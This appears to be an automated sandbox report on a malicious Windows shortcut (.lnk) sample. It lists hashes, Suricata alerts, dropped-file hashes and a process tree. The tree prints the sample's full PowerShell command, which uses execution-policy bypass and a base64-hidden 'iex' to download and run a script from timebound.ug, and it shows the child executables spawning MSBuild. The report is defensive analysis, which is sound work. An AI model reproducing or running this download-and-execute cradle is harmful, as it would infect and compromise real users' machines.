Analysis
-
max time kernel
36s -
max time network
5s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 17:42
Static task
static1
Behavioral task
behavioral1
Sample
01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6.lnk
Resource
win7-20220414-en
General
-
Target
01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6.lnk
-
Size
840KB
-
MD5
adedd222b98f6677ac30ccc81c38954b
-
SHA1
1477164ec83772104e90ddda0f882283a002990f
-
SHA256
01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6
-
SHA512
085aeadd6d15025ec4e508cbcdfeb5c10b7c524510d8a4760a6d7214e57e71c8272b1071ca286f50a1dbe1abd39bf6c801365be5f6660133ccf9a9d091e98663
Malware Config
Extracted
http://timebound.ug/pps.ps1
Signatures
-
suricata: ET MALWARE Windows executable base64 encoded
suricata: ET MALWARE Windows executable base64 encoded
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6.lnk1⤵PID:4792
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec bypass -windo 1 $wM=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal t $wM;$nXR=((New-Object Net.WebClient)).DownloadString('http://timebound.ug/pps.ps1');t $nXR2⤵PID:1136
-
C:\Users\Public\hdu.exe"C:\Users\Public\hdu.exe"3⤵PID:3592
-
C:\Users\Public\hdu.exe"C:\Users\Public\hdu.exe"4⤵PID:2096
-
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 05⤵PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe"C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe" 05⤵PID:4676
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵PID:916
-
-
-
C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe"C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe" 05⤵PID:3108
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵PID:4776
-
-
-
C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe" 05⤵PID:5092
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵PID:2888
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
294KB
MD5aa0ae479ea7e7e3584addd2ef73f1661
SHA175fde2883928bfd541aed42f570001044155bd51
SHA25694a6219cdaecaf679cf8de0ed994bff5256acc6201dba29d69bde7405982eb10
SHA5123ed101533d477dd4dcaf0c4af5f6123e62a903ef9245d6b791a26203410d8a65134ff9cc37650770bb5cfb45fc68d31072458f92d4a6e11ae6278c0335435bb2
-
Filesize
341KB
MD5a21f85b88a3c424972498c120d1e52f0
SHA1bd944b403b0ff523bb7065e4af26fcf8ffb3363e
SHA256ef0295372522eaf2d99eb0ebc31fd37ab24271f917fde26143f15ce4e1161ad2
SHA51275065cc12043092e87eabbc635188e9a3379a5ae0eb5825e07db334d65766a16cecbda30a901e099e9fa776bbed9d6ce342491bd295de7aa81ca85d868240b70
-
Filesize
358KB
MD5274f86a032090d1285c806de158d568b
SHA1a2e4177b2ed83dd3da377305b57b80315a86c80d
SHA256508294970beaf59f6c4b44d7246e765ca9fb1bc86e507db42c2baa7d90162dd2
SHA512d348f4f79bad99c38320dc19ed1ada5c78193a7a4a90a3d588f71071fe21f31710c077e4e7aaa4c0a73cd104e38f805ad245a931c8bb3b5f4e17b4cdc9d97157